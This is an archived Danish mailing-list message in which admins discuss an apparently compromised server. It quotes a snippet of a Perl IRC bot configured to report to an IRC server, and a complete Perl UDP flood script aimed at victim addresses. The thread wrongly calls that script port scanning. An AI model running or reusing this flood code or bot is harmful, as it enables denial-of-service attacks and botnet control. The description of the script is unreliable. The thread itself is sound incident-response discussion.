| Thread Previous • Date Previous • Date Next • Thread Next |
Peter Rude wrote:
Mon ikke du løber ind i det samme problem igen hvis du vælger SuSE 9.0? Medmindre SuSE selvfølgelig stadig laver sikkerhedsopdateringer..Har ikke lige lyst til at geninstallere - I hvert fald ikke en SuSE 9.0
Ligner også en configurations fil, gætter på botten melder tilbage til dens "ejere" via IRCSå jeg rodede lidt i apache's log filer og fandt følgende:#!/usr/bin/perl# # Bot ScanBOT v1.0a # by Bitchx and Morgan # irc.indoirc.net - #Bitch - #Morgan ################################################################################################################################################# use IO::Socket::INET; use HTTP::Request; use LWP::UserAgent; ###############CONFIGURATION################### my $processo = "/usr/local/apache/bin/nscan -DSSL"; my $printcmd=" cmd [FullNetwork]"; #<---- Change this for your CMD my $server="irc.fullnetwork.org"; my $porta="6667"; ----snip---- Den er ikke eksekverbar.
OG:
rsy.txt dateret Nov 27 16:14
Et lille perl script med flg:
---- start ----
#!/usr/bin/perl
# INC.
#
use Socket;
if (@ARGV < 2) {
die "[+] labsec udp\n" .
"[+] perl leet.pl <victim[:victim2:...:victimN]> <tempo> [porta]\n";
}
@sin = map { inet_aton $_ } split /:/, $ARGV[0];
$t = time +$ARGV[1];
# nazis are comming!!
socket SS, PF_INET, SOCK_DGRAM, 17;
while (1) {
send SS, 0, 0, sockaddr_in($ARGV[2] || rand 65000, $sin[rand @sin]);
exit if time >= $t;
}
Ligner en udp portscanning hvor ip addresser gives som argument prøves i en uendelighed (portene skifter).
Der mangler vidst noget mere.. Kan umiddelbart ikke finde sammenhængen mellem configurationsfilen og scriptet.# ATE AGORA PESSOAS TEM O PROGAMA: 1 # NAO PASSEM PRA NINGUEM! ---slut--- Som heller ikke er eksekverbar. Kan ikke lige gennemskue funktionen.....
Det er ret resourcekrævende for maskinen af lave den der scanning specielt uden nogle sleep's i programmetUmiddelbart vil jeg mene at serveren er under angreb - meilserveren har været usædvanligt belastet at mails til irrelevante adresser, men der er ikke blevet sendt noget videre ud - jeg kan ikke se nogle tegn på at angrebet er lykkedes - Der er ikke nogen kunst at skrive til /tmp men det er en lidt større kunst at afvikle kode der.
Reinstaller du kan ikke vide om der er plantet et rootkit af en eller anden art, og vælg evt. en flydende distribution som fx. Debian, så behøver du ikke at installere opdateringer, blot lave en apt-get update && apt-get dist-upgrade engang imellem.Så jeg strammer op på backup'en og holder øje.
Bo
| Thread Previous • Date Previous • Date Next • Thread Next |
